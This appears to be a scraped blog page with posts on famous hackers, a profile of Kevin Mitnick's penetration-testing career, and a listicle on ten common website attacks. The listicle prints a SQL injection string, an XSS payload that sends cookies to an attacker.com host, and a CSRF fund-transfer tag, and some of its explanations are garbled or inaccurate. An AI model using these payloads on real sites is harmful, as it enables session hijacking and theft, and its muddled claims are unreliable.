ISIS HACKER KILLED

6:03:00 AM Unknown 0 Comments

0 comments:

Notorious hackers

9:06:00 AM Unknown 0 Comments

Julian Paul Assange

Julian Paul Assange
An Australian editor and publicist, Julian Paul Assenge is the founder of WikiLeaks, a site that publishes submissions of secret information from personal web accounts and news leaks. Before he became internationally acclaimed for his founding of WikiLeaks, he was a teenage hacker who published US military documents. At age 16, he joined the International Subversives group and hacked computer systems under his pseudonym, “Mendax.”

Mike Calce

Mike Calce
Michael Demon Calce, also known as the MafiaBoy of cyberspace, was a high school apprentice at West Island, Quebec when he got involved in a series of publicized denial-of-service attacks against some of the largest commercial websites, including Yahoo!, eBay, CNN, Amazon.com and Dell, Inc. In 2000, he targeted Yahoo! through project Rivolta, a term which means “riot” in Italy. He initially denied the offenses charged against him but accepted the accusations in 2001

Chad Davis

Chad Davis
An American hacker who operated under the pseudonym Mindphasr, Chad Davis is among the most notorious cybercriminals of the 20th century. He founded Global Hell, a syndicate of computer hackers in the United States, and authored the hacking of the websites of some of the largest organizations and corporations in the country. He was the man behind the vandalism of the homepage of The White House and the US Army with a message saying “GlobalHell will not die.”

Nahshon Even-Chaim

Nahshon Even-Chaim
Also known as Phoenix, Nahshon Even-Chaim was the first computer hacker to have ever been convicted in Australia. His mission was to break into computer systems by dialling indirectly or placing a call through X.25 networks or internet connectivity. Among the websites he damaged were those of the University of California, Berkley, University of Wisconsin-Madison, and the Lawrence Livermore National Laboratory. Hacking computers was his way of ridiculing the entire computer security community.

Raphael Gray

Raphael Gray
At age 19, Raphael Gray was able to hack several computer systems around the world in just a matter of one month. His mission was to gain unauthorized access to credit card information, which eventually netted him millions of dollars. Dubbed “The Bill Gates Hacker,” Gray broke into secure computer systems and published all the credit card information he accessed as part of his multimillion credit card pound mission.

0 comments:

WORLDS MOST NOTORIOUS HACKER KEVIN MITNICK

9:05:00 AM Unknown 0 Comments

Why Kevin Mitnick, the World’s Most Notorious Hacker, Is Still Breaking Into Computers

kevin_mitnick
Mitnick Security

Look no further than Kevin Mitnick’s business card to see how some things never change.
Cut from stainless steel, the card includes breakaway pieces of a fully functional lock-picking kit. It’s an apt symbol for a man who has made a career, first criminal and now legitimate, of breaking locks both digital and physical and going places where he has not been invited.
We met in Hanover, Germany, this month where he had been invited to speak on security issues at the CeBit technology conference; he was billed by its organizers as the “world’s most famous hacker.” He earned the title in the 1990s, when the world was still waking up to the existence of the Internet. Mitnick was, for a two-year period ending in 1995 with his arrest by the FBI in North Carolina, its most-wanted outlaw. A 1994 New York Times profile breathlessly described him as having hacked into computers at the North American Air Defense Command as a teenager. It wasn’t true, but it became part of his legend.
In 1999, as part of a deal, he pled guilty to four counts of wire fraud, two counts of computer fraud and one count of illegally intercepting communications. All told he spent five years in federal prison ending in 2000. That included eight months in solitary confinement because a federal judge believed he could “whistle tones into a phone and launch a nuclear missile.” Again, the legend.
Now 51, he concedes that he hacked into computers belonging to companies like Motorola, Nokia and Sun Microsystems “for the pursuit of knowledge and adventure,” he said, not for personal profit or to cause any meaningful harm. In an age when hackers in the pay of criminal gangs or third-world countries daily pilfer data from multinational corporations around the world for sale on the black market, the notion of hacking for sheer curiosity hearkens back to a more innocent time.
These days, Mitnick is a highly paid and successful security consultant to some of the world’s largest companies including FedEx, Toshiba, CBS, IBM and Lockheed Martin. And he’s good at what he does. “My primary business is doing penetration testing,” he said. “We test the physical security, the technical security, the people. We test their wireless networks, their VOIP phones. We test everything across the board to look for vulnerabilities so our clients can fix them.”
By “testing” Mitnick means accepting a large fee — he didn’t say how much — to do to these companies exactly what landed him in prison two decades ago: Gain entry to their computers, their networks, their phones and even their buildings, by any means necessary without being detected and then to report back on how he did it.
And here’s probably the most interesting fact: Mitnick and his constantly changing team of speciality hackers have a 100 percent success rate. That’s no legend. “It’s not even bragging,” he said. “It’s just a fact.”
At this point Mitnick spins off on a detailed account of a recent job for a large retailer in New York. For 15 minutes he weaves a tale rife with technical details and specifications recited from memory on how he and his team tricked a store manager into believing Mitnick was a technician from its alarm company. As Mitnick tells it, any reasonable person would have fallen for it. He arrived on the scene with a working building access card with the alarm company’s logo stamped on it. His ruse was that he was there to “make some adjustments” to some of the alarm system’s motion sensors.
The end objective was to penetrate not only the retailer’s computer network — the weak spot there turned out to be a networked printer with a default password — but also to sneak into one of its high-profile Manhattan stores after hours without being caught. It took four weeks of reconnaissance and research including building a machine to copy employee building access cards. When the job was done Mitnick delivered his report, containing step-by-step instructions on how to correct each problem found, to the senior executive who had hired him — but not by email. “I still had access to their network so I left a copy of the report on his PC’s desktop,” Mitnick said. “It was more secure to do it that way than email it. He thought that was a nice touch.”
His story illustrates the common thread that occurs in practically all the consulting gigs he takes on and in the three books he’s written: The human element.
On most of his jobs Mitnick is asked to attack not only a company’s computers, but also to fool its employees into letting him walk right in to places from which he would otherwise be locked out. These “social engineering” attacks amount to tricking someone with access to a computer or a building or some other asset to give up information. Hacking humans is easier than hacking computers: “The most effective way to carry out an attack is to get the client — a person — to do something stupid,” he said. And as the old saying goes, there’s no cure for stupid.
When the aim is to breach a computer network, the best way to do that is to get someone inside a target company to open a computer file they shouldn’t. “If you’re going after a law firm, for example, you can usually get someone to click to open a PDF document in a heartbeat,” he said. That innocent-looking PDF might be loaded with malware that gives the attacker a foot in the door to the firm’s network.
One foot in the door is all it takes. It’s usually not long before that door and many like it swing wide open under Mitnick’s determined probing: He’ll look for lists of other computers and what software they run, directories of people, their user names, passwords, cellphone numbers and any other useful information to help more thoroughly compromise a network. One way in is never enough.
Looking back he thinks little of the profound irony that he’s hacking for a living 20 years after it landed him in prison. But without the prison time, there would be no legend. And without the legend, there would be no hefty consulting fees. (How hefty? He still won’t say.) “I started all this for fun as a hobby and now I do it for a living,” he said. “I never thought in a million years that there would be opportunities like this.”
And if you’re still unconvinced that this ex con has gone straight, consider this: You may have already benefitted indirectly from his work. One of the three major credit bureaus — he won’t say which one — hired him recently for another of his “tests.”
The result was pretty much the same as that of the retailer. Again Mitnick spins a yarn with lots of detail ripped from memory but here’s the tl;dr version: “We owned them. We owned their networks, their buildings and their people. We had access to everything. It’s going to take them three years to fix all the problems we found.”
                          FOR NOTORIOUS HACKERS:CLICK HERE

0 comments:

10 WAYS HACKERS HACK UR WEBSITE

8:13:00 AM Unknown 0 Comments

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE

Ways Hackers Hack Your Site

Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?
They’ve all been recently hacked.
Yes, hacking is a growing threat for every business both large and small.
Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time. Defencely have been running analysis since it’s existence on different possible attack vectors and hence has been proven with a record for web application security in India and is currently going global. There are specifics onto which Defencely had been working it’s way onto making a name on the CIO portfolio for it’s immense success with Information Technology Security as a service provider. To an amazement, Defencely has not only stood up to it’s client in the past, but now it has been providing ground-breaking research for all of it’s client with special deliverables given services from Defencely has been opted. But there is a side, which Defencely has chosen to opt for the betterment of the web world, and it’s WHITE HATE ETHICAL HACKING which makes it’s way through corporate business world and provides in-depth security services for an overall web security protection to it’s valued clients. Apart from each of the services provided by Defencely, it has maintained a wise standard onto Bug Hunting and hence a proven excellence for it’s quality deliverables which the Red Team Security Experts. The red team has taken it’s responsibility to represent Defencely in various gratitudes, whether it is on spreading information security concerns, attending information security conferences to providing free of cost industrial hands on penetration test for an initial approach and this alone had resulted in a wise deduction of how security could just be an illusion to the corporate world and how businesses could be ruined over-night.
Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.
In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID='” + request.getParameter(“id”) +”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.
For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:
(String) page += “<input name=’creditcard’ type=’TEXT’ value='” + request.getParameter(“CC”) + “‘>”;
The attacker modifies the ‘CC’ parameter in their browser to:
‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’
This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.
Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).
If a hacker exploits the authentication and session management system, they can assume the user’s identity.
Scary indeed.
Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:
  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?
If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.
Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.
For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.
Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.
This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.
In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.
It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.
The problem, of course, is that you’re not getting into what you think you’re getting into.
A classic example of a social engineering attack is the “Microsoft tech support” scam.
This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.
Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.
If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.
In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.
In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.
In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:
<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />
In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.
Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
The following vulnerable components were downloaded 22 million times in 2011:
By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.
And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.
It’s kind of like having your car stolen when you really need to get somewhere fast.
The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.
The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

0 comments: